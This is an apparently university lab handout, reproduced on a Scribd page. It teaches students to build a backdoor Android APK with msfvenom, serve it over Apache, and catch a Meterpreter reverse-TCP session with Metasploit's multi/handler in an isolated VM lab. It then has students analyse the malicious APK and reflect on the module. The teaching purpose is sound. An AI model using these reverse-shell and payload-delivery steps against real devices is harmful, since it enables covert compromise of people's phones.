Scribd Logo
Upload

Welcome to Scribd!

  • 8 views

    Sit379-9 1P

    Uploaded by

    Amir121

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd

    Sit379-9 1P

    Uploaded by

    Amir121
    8 views3 pages

    Original Title

    SIT379-9.1P

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Download as pdf or txt
    8 views3 pages

    Sit379-9 1P

    Uploaded by

    Amir121

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Download as pdf or txt
    of 3

    WEEK 9 – TASK P

    Pass Task.
    Release Date: 9-16/9/2024

    Learning Outcomes

    • Demonstrate exploitation of Android device using Metasploit


    • Analyse malicious android apk for securing android mobile devices.
    • Demonstrate understanding of mobile platform hacking
    • Reflect on Module 9 learning experience.

    Instructions

    An answer sheet template is available on OnTrack as a `Resources’. Please


    download the answer sheet and fill it with your answers. To upload on OnTrack, you need to
    convert the answer sheet template document to PDF. MS Word includes built-in PDF
    conversation capability.

    All questions/tasks that have the icon below must be attempted for you to complete this
    task. If screenshots are required, please ensure that text in screenshots is readable.

    Remember that troubleshooting technical problems is part of learning in this field. Tasks
    are not step-by-step guide. You need to be in the driver seat and learn concepts by doing – as
    you would when you start your future job (many times even your supervisor does not know the
    answer to problems you face). Do your research patiently to solve issues you face and if you
    are stuck:

    Help is always available in SIT379/704. Please go to Discussions and ask your questions
    about this task in Week 9 P. Also, an extra support and help is provided on IT helphub.
    All students are encouraged to participate and help peers with their questions via peer-
    support channel on Teams. Helping others is a great way to learn and think about aspects
    you may have overlooked. You can also seek help from tutors during online and face-to-
    face workshops. Please do not raise your questions through OnTrack, or Email.

    Note: This task includes three sections (A, B, and C) that cover different aspects of achieving learning
    outcomes. Students will provide evidence of completing tasks and learning and reflect on their learning.
    A: Hacking Android Device
    In this task, you will use the provided Android emulator VM, pfSense and Kali Linux to hack
    mobile devices (i.e., Android). Import the Andriod VM in your virtual Linux, as it is already
    set up with different network settings; you need to change its interface to “internal network”
    (intnet).

    • Compromise Android using backdoor/reverse shell


    1. In your Kail Linux, Open the terminal to create a backdoor/reverse shell payload to
    exploit the Android device. As usual, you will use msfvenom to create this malicious
    payload as shown in the figure. This command will create an Android Application
    Package (APK). Remember to change the Ip address to be your Kali VM IP address.

    2. Share or send this malicious apk (Backdoor.apk) to the victim machine (Android VM).
    In real world scenarios, attacker can deliver this malicious code using different methods
    such as email phishing or even send it via Bluetooth. For learning purpose, you will
    use shared resources. In your Kali machine, follow these steps to create shared folder
    and send the file to victim machine:
    A) mkdir /var/www/html/share, then enter
    B) Type chmod –R 755 /var/www/html/share, then enter
    C) Type chown –R www-data:www-data /var/www/html/share, then enter
    D) Run service apache2 start, then click enter to start the Apache web server
    E) type cp /rot/Desktop/Backdoor.apk /var/www/html/share

    3. Open Metasploit in Kali Linux and type “use /exploit/multi/handler “ and then enter
    4. Type “set payload android/meterpreter/reverse_tcp and specify the LHOST (your kali
    machine IP address). The listening port by default is (4444).
    5. Type exploit -j –z .This command exploit simply tells Metasploit to start the exploit.
    The -j flag tells it to run in the context of a job and -z simply means to not interact with
    the session once it becomes active. So, this will run the exploit as a background job.

    6. In the Android VM, open the browser and type “http://your kali linux IP
    address/share” (e.g., http://192.168.1.126/share). You should be able to download the
    application” backdoor.apk” and then install in the Android VM. After opening the
    application, you should be able to get a session with Android device.
    T ask T 1:T After completing the provided steps and successfully opening a
    Meterpreter session, submit the following screenshots: The Meterpreter session initiation
    and the commands you entered along with their outputs, specifically to show: 1) the IP
    address of the Android device, 2) the current remote directory, 3) Changing the directory to
    sdcard, 4) a list of running processes on the Android device.

    • Securing Android- Analysing a malicious app using online Android analysers

    In this task, you will use Sixo Online APK Analyzer “ https://sisik.eu/apk-tool “ to analyse “
    Backdoor.apk”. Open the link in your Browser and upload this malicious file.

    ask T 2:TGive examples of the information provided by the analyser. Is there


    any permission requested from the user in this malicious code? provide also
    example. You must also provide screenshots of the output of analyser to support
    your answer.

    B. Evidence of learning

    Task B1: Provide evidence of your work on module 9. This can contain notes you
    took, activities you solved, and any other work you produced. You can scan or take pictures
    or screenshots of your work into a pdf document. It is a good idea to include short
    comments together with your evidence.

    C. Reflecting on the content and your learning

    Task C1: Reflect on what you have learned this week. What is the most important
    thing you learnt in this module? How does this relate to what you already know? Why do
    you think your course team wants you to learn the content of this module?

    You might also like